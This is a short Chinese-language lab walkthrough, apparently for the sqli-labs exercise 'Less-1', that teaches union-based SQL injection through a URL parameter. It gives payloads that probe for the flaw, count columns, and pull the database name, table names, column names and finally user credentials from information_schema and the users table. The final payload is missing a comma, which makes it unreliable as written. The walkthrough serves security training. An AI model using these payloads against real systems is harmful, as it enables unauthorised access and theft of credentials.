less-1:联合注入
判断是否有SQL注入漏洞
1,当输入Less-1/?id=1
时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询
2,判断SQL语句是否是拼接
a,当我们输入1’时会报错
b,当我们输入1'--+
时不会报错,就可以使用联合查询的方式进行sql注入
联合注入
我们要了解有多少列可以用order by
进行查询
在输入3的时候页面正常显示,输入4的时候页面访问错误。说明有三列
爆破在这三个列那个列是在页面显示的
从显示来看第2,3列里面数据是显示在页面的
爆破数据库名
输入?id=1'union select 1,database(),3--+
显示出数据库名是security
爆破表
在数据库里面默认有一个库information_schema里面有所有表的信息。
输入?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
时会爆破出表名
爆破字段名
上一步我们获取了4张表,根据表名可以猜到用户的账户密码在users里面
输入?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
得到了两个敏感的字段,username和password
爆破用户名和密码
输入?id=-1' union select 1,2,group_concat(username,':'password) from users --+
就可以得到对应的信息